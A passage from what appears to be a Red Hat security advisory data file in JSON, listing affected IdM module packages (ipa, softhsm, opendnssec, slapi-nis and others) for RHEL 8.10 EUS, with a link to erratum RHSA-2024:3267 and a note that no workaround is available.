"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
